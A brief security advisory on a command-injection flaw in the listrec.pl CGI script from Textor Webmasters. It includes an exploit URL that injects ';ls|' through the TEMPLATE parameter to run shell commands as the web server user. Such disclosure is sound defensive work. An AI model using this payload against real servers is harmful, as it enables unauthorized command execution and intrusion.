|
|
| |
| Textor Webmasters creates custom-made CGIs allowing the easy creation and easy manageability of web sites. A security vulnerability has been found in one of the company's CGIs that allows attackers to execute arbitrary commands with the security privileges of the web server (usually 'nobody'). |
| |
Credit:
The information has been provided by Alexey Sintsov.
|
| |
Vulnerable systems:
Listrec.pl version earlier than 1998 (including)
Exploit:
Accessing the URL below will yield the directory listing of the current directory:
http://www.example.com/cgi-bin/common/listrec.pl?APP=app_name&TEMPLATE=;ls|
|
|
|
|
|
|
|
|